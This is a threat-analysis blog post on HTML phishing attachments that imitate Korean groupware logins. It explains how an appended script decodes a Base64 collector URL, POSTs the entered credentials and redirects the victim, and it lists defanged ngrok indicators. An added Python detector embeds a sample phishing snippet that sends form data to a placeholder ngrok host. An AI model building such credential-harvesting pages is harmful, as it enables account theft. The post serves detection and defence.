Phishing Script Files Being Distributed by Impersonating Various Groupware

The ASEC analysis team introduced ‘phishing websites targeting Korean email service users’ in May of last year through a TI analysis report and an ASEC blog post. At the time, the team showed how attackers harvested credentials from users of NAVER WORKS, MAILPLUG, hiworks, Chollian, and Daum.

Files that disguise themselves as a company's groupware login page in order to steal account credentials are one of the most common phishing types in circulation, with small variations in the email subject, body, attachment name, script code, and so on.

The current attackers likewise disguise their files as groupware products that Korean users commonly use, but this time they use a simpler method: the same script file is renamed to suit each recipient. The team also found multiple files impersonating NAVER WORKS, hiworks, Microsoft Outlook, and Microsoft SharePoint that share a similar script code format.

The table below lists the file names found so far and the dates on which they were discovered. Most of the file names include a company name, and they take various forms such as requests for quotation, purchase orders, contracts, and order forms. Two of the files are notable in that each had its company name changed at least 5 times before distribution. Some of the files are present on VirusTotal, but since no other vendor detected them at all, users are likely to mistake them for normal files.

For instance, files with the same hash have been distributed under different names, such as ‘** Science_positive request form.htm,’ ‘** Ecotech.htm,’ and ‘** Factory (Inc.) request for quotation.htm’. There have also been cases of script files with different hashes but a similar format being distributed under the same file name. The malicious part of the script is discussed in more detail at the bottom of this post.

| File name | Date discovered |
| --- | --- |
| PO2648357.htm (an abbreviated form of Purchase Order, P.O) | December 20th, 2021; December 22nd, 2021 |
| ** Factory (Inc.) request for quotation.htm | December 24th, 2021 |
| ** Technology (Inc.) (order list.htm | December 28th, 2021 |
| ** Industry (Inc.) contract.htm | January 4th, 2022 |
| ** Industry. (order form).htm | January 19th, 2022 |
| DOC Q0017 3509.html | January 24th, 2022 |
| ** Ecotech.htm | January 26th, 2022 |
| authenticationsharepointazon.htm | January 11th, 2022 |
| (Inc.) ** Tech (inquiry for quotation).htm | December 20th, 2021; December 27th, 2021; January 19th, 2022; January 20th, 2022 |
| ** Science_positive request form.htm | December 17th, 2021; January 23rd, 2022 |
| (Inc.) ** request for quotation (20210608).htm | January 14th, 2022; January 25th, 2022; January 26th, 2022 |
| **** Technology (Inc.)(order form).htm | December 29th, 2021; January 4th, 2022; January 6th, 2022 |

Table 1. Name and discovered date of distributed files

When the HTML file attached to the phishing email is opened, a login page impersonating one of several groupware products appears, as shown below. Because it is hard to tell the fake page from the real one, users should take extreme caution.

Figure 1. Phishing files disguised as various groupware (1)

Figure 2. Phishing files disguised as various groupware (2)

Figure 3. Script inside the file that is disguised as NAVER WORKS groupware

Comparing the script code of the phishing file with that of the normal NAVER WORKS login page in a text editor shows that the script shown above has been appended at the bottom.

In the part that uses the JavaScript atob method, the variable d is declared holding the Base64-encoded URL to which account credentials are sent. The code shows that, when a user enters an ID and password, the data is sent to that credential-collection URL via an HTTP POST request. Then, in the part that uses window.location.replace, the attacker redirects the user to the legitimate groupware page shown below so that the user does not realize they have just visited a phishing page.

The attacker used distinct credential-collection URLs, as shown below, most likely to tell which impersonated page the captured credentials were entered on. In fact, there have been multiple reports since last year of ngrok.io domains being used for phishing.

  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php
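As an added triage example (not code from the original post or from AhnLab), the script below applies the three traits just described to an HTML attachment: it decodes Base64 literals passed to atob(), keeps those that decode to URLs, checks for an HTTP POST and a location.replace() redirect, and flags ngrok.io hosts. The sample HTML and its collector hostname are constructed placeholders, not indicators from the post.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Traits of the appended script described in the post: atob() on a Base64 literal,
# an HTTP POST of the entered data, and a location.replace() redirect afterwards.
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
POST_RE = re.compile(r"""method\s*[:=]\s*['"]POST['"]|\.open\(\s*['"]POST['"]""", re.I)
REDIRECT_RE = re.compile(r"(?:window\.)?location\.replace\(")
TUNNEL_SUFFIXES = (".ngrok.io",)  # tunnelling service the post reports being abused

# Constructed sample; the collector host is a hypothetical placeholder, not an IoC.
COLLECTOR_URL = "https://example-placeholder.ngrok.io/collect.php"
SAMPLE_PHISHING_HTML = """
<form id="login"><input name="id"><input name="pw" type="password"></form>
<script>
var d = atob("__B64__");
document.getElementById("login").onsubmit = function () {
  fetch(d, { method: "POST", body: new FormData(this) });
  window.location.replace("https://legit-groupware.invalid/login");
};
</script>
""".replace("__B64__", base64.b64encode(COLLECTOR_URL.encode()).decode())


def decode_atob_literals(html):
    """Return the decoded text of every Base64 literal passed to atob()."""
    decoded = []
    for _quote, b64 in ATOB_RE.findall(html):
        raw = re.sub(r"\s+", "", b64)
        raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
        try:
            decoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid Base64; skip this literal
    return decoded


def scan_html(html):
    """Flag an HTML attachment that decodes a URL, posts data and then redirects."""
    urls = [s for s in decode_atob_literals(html) if urlparse(s).scheme in ("http", "https")]
    findings = {
        "decoded_urls": urls,
        "tunnel_host": any((urlparse(u).hostname or "").endswith(TUNNEL_SUFFIXES) for u in urls),
        "posts_data": bool(POST_RE.search(html)),
        "redirects": bool(REDIRECT_RE.search(html)),
    }
    suspicious = bool(urls) and (findings["posts_data"] or findings["redirects"])
    findings["verdict"] = "suspicious" if suspicious else "clean"
    return findings
```

Run scan_html() over each .htm/.html attachment pulled from the mail gateway; the decoded URLs are the values to compare against the post's indicators.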

Since legitimate groupware images are used and users may be confused, they should still refrain from entering account credentials on web pages opened from email attachments. If you receive a suspicious email and use the groupware mentioned in it, it is recommended to verify by logging in from the official groupware website in your web browser.

You should also update the anti-malware that you use to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the malicious script files described in this post under the aliases below.

[File Detection]
Phishing/HTML.Generic.S1713

[IOC]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
